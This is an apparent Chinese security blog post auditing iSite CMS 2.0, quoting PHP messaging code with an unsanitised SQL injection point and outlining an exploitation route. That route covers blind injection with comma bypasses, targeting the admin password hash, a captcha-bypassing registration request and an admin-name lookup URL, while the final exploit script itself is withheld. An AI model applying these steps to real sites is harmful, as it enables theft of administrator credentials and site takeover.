iSite CMS最新漏洞(代码审计)

  • 2
  • 556 views
  • A+
所属分类:颓废's Blog
摘要

File:/isite/components/messages/messages.fe.php line:103 if($form->status == TFORM_STATUS_GETED_VALID){ $arr = $form->getValues(); $tos = explode(‘,’,trim($arr[‘to’]));//,被拆分 对注入有一定影响 $noExistsMenber = array(); $toMenbers = array(); foreach ($tos as $menber){ $i = $this->DBE->getOne(“select `id` from #__user where `name`=’$menber'”);//未经过滤 引发注入 if(is_null($i) or empty($i)){ $noExistsMenber[] = $menber; }else{ $m[‘name’] = $menber; $m[‘id’] = $i; $toMenbers[] = $m; } } if(!empty($noExistsMenber)){ addGlobalNotice(“以下用户不存在:”.implode(‘,’,$noExistsMenber));//可以bool盲注 }else{ $msg[‘tos’] = $arr[‘to’]; $msg[‘subject’] = $arr[‘subject’]; $msg[‘content’] = $arr[‘content’]; $mMessage->sendMessage($toMenbers,$msg); $this->flash(‘成功’,’发送成功’,bu(1,’messages’,’inbox’)); } } 再看一下sendMessage函数
File:/isite/components/messages/models/message.php
function sendMessage($to,$message,$type=null,$newCall=1){ if(isset($to[‘name’]) or is_string($to)){ if(is_string($to)){ $to[‘name’] = $to; } if(!isset($to[‘id’])){ $to[‘id’] = $this->_db->getOne(“select `id` from #__user where `name`=’$to[name]'”); }//select `id` from #__user where `name`=’-1’and(union)select user()# global $gUser; $message[‘to’] = $to[‘name’]; $message[‘to_id’] = $to[‘id’]; $message[‘from’] = $gUser->name; $message[‘from_id’] = $gUser->id; $message[‘create_time’] = TIME_STAMP; $message[‘type’] = $type; $this->insert($message); $this->_db->execute(“update #__user set `new_msg_count`=`new_msg_count`+1 where `id`=$message[to_id]”);//可能有回显 if($newCall>0){ $message[‘to’] = ”; $message[‘to_id’] = 0; $this->insert($message); $newCall–; } }else if(is_array($to)){ foreach ($to as $sto){ $this->sendMessage($sto,$message,null,$newCall); } } } 地验证
环境: Apache2 php5.2.17(注意php版本不要太高) win2003 Mysql5.5.40

系统版本: iSite CMS Ver:2.0 RC1 Build:520

管理用户 U:admin P:admin
测试用户 U:test P:test

使用测试用户登陆 给a用户(不存在)发送站内信

代码审计
对CMS系统流程有了整体把握后 使用审计工具自动化审计 发现一些敏感点
然后逆向跟踪相关变量 发现以下脆弱点

站内信板块关键代码

File:/isite/components/messages/messages.fe.php line:103

if($form->status == TFORM_STATUS_GETED_VALID){       $arr = $form->getValues();       $tos = explode(',',trim($arr['to']));//,被拆分 对注入有一定影响       $noExistsMenber = array();       $toMenbers = array();       foreach ($tos as $menber){         $i =         $this->DBE->getOne("select `id` from #__user where `name`='$menber'");//未经过滤 引发注入         if(is_null($i) or empty($i)){           $noExistsMenber[] = $menber;         }else{           $m['name'] = $menber;           $m['id']  = $i;           $toMenbers[] = $m;         }       }       if(!empty($noExistsMenber)){         addGlobalNotice("以下用户不存在:".implode(',',$noExistsMenber));//可以bool盲注       }else{         $msg['tos'] = $arr['to'];         $msg['subject'] = $arr['subject'];         $msg['content'] = $arr['content'];         $mMessage->sendMessage($toMenbers,$msg);         $this->flash('成功','发送成功',bu(1,'messages','inbox'));       }     }

再看一下sendMessage函数
File:/isite/components/messages/models/message.php

function sendMessage($to,$message,$type=null,$newCall=1){     if(isset($to['name']) or is_string($to)){       if(is_string($to)){         $to['name'] = $to;       }       if(!isset($to['id'])){         $to['id'] = $this->_db->getOne("select `id` from #__user where `name`='$to[name]'");       }//select `id` from #__user where `name`='-1'and(union)select user()#       global $gUser;       $message['to'] = $to['name'];       $message['to_id'] = $to['id'];       $message['from'] = $gUser->name;       $message['from_id'] = $gUser->id;       $message['create_time'] = TIME_STAMP;       $message['type'] = $type;       $this->insert($message);       $this->_db->execute("update #__user set `new_msg_count`=`new_msg_count`+1 where `id`=$message[to_id]");//可能有回显        if($newCall>0){         $message['to'] = '';         $message['to_id'] = 0;         $this->insert($message);         $newCall--;       }     }else if(is_array($to)){       foreach ($to as $sto){         $this->sendMessage($sto,$message,null,$newCall);       }     }   }

地验证
环境: Apache2 php5.2.17(注意php版本不要太高) win2003 Mysql5.5.40

系统版本: iSite CMS Ver:2.0 RC1 Build:520

管理用户 U:admin P:admin
测试用户 U:test P:test

使用测试用户登陆 给a用户(不存在)发送站内信
iSite CMS最新漏洞(代码审计)

然而默认情况下 系统的debug=0 并不会报错显示注入的语句
将debug调为1 返回报错
iSite CMS最新漏洞(代码审计)

因为系统默认的debug=0 让该报错回显难以利用 只能尝试Sql盲注

iSite CMS最新漏洞(代码审计)iSite CMS最新漏洞(代码审计)

如何绕过 , mid(from)

iSite CMS最新漏洞(代码审计)

如何保证获取的密文为admin用户的密文

having id=1

iSite CMS最新漏洞(代码审计)

EXP编写
注册 (可绕过验证码)
bypass1
iSite CMS最新漏洞(代码审计)

bypass2iSite CMS最新漏洞(代码审计)

POST /index.php?igo=iss,menbers,reg&step=2 HTTP/1.1 Host:www.xxxxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 332 Cookie: KNT_SESSION_time=1501764992 Connection: keep-alive Upgrade-Insecure-Requests: 1  name=sksec10624426&password=123456&password2=123456&captcha=164490&__captchaCode_captcha=7f8657885d801eef4585390351110a7626c1967a&email=&hit_question=&hit_answer=&real_name=&gender=-&birthday=&address=&post_code=&phone_code=&mphone_code=&memo=&submit=%CF%C2%D2%BB%B2%BD&__issForm%5B__name%5D=reg&__issForm%5B__captchaCode%5D=164490

获取管理员用户名

https://www.0dayhack.com/index.php?igo=iss,menbers,reg,3,1   -  yourid

登陆

EXP 获取密码
iSite CMS最新漏洞(代码审计)

exp

管理员设置 回复 可见隐藏内容

作者:Leo

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:2   其中:访客  2   博主  0

    • rurrrrr rurrrrr 0

      12牛

      • 看啊看看看 看啊看看看 0

        看啊看看看